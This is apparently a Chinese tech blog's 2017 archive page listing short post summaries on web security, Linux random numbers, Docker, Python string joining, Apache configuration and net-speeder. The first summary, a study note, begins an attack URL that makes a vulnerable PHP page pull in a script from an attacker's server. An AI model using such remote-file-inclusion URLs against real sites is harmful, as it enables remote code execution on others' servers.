01 2017 档案
摘要:今天在学习《白帽子讲web安全》一书是,提到一个php远程文件包含漏洞 可以从攻击者服务器中的一个写好的攻击脚本中远程执行命令 服务器中有漏洞的页面代码为: 攻击者服务器中的攻击脚本为: 攻击者可以构造如下url远程调用攻击者服务器上的攻击脚本: /test.php/?param=http://23
阅读全文
摘要:今天看《白帽子讲WEB安全》一书,看到笔者谈到Linux如何实现真随机数生成,感觉非常有用,记录下来 直接通过Linux的随机数设备生成,基本贴近物理方法生成,属于可靠手段,比使用时间作为种子生成随机数要可靠的多 通常我们认为依据系统时钟产生的随机数是可靠的,实际上,时间是不断增长的,只要攻击者知道
阅读全文
摘要:我们运行docker容器的时候,使用了-d参数,把容器在后台运行后。 这个时候,我们使用docker ps命令,我们就可以知道哪些程序在后台运行。 我们要怎么进入到docker容器呢? 1:使用docker attach命令 我们使用 docker attach db3 或者 docker atta
阅读全文
摘要:在python2中,string 模块中有一个join()函数,用于以特定的分隔符分隔源变量中的字符串,将其作为新的元素加入到一个列表中,例如: 这是一个电子邮件的标准格式,通过string.join()函数,可以把元组中的各个字段以“\r\n”分隔后保存到body变量中 但是在python3中,s
阅读全文
摘要:一开始看到网上有各种各样的解决方法: 第一种是直接将 sites-available目录下的000-default.conf中的下列代码: 修改为: 这样修改后发现应用的样式有所改变 后来看到有人说需要把apache2.conf文件中的下列代码: 修改为: 但是这样修改后导致的一个问题就是会出现页面
阅读全文
摘要:什么是net-speeder 项目简介:http://www.snooda.com/read/324 Githu主页:https://github.com/snooda/net-speeder 简单来说就算是: 为了解决丢包问题,最简单粗暴的方法就是双倍发送,即同一份数据包发送两份。这样的话在服务器
阅读全文
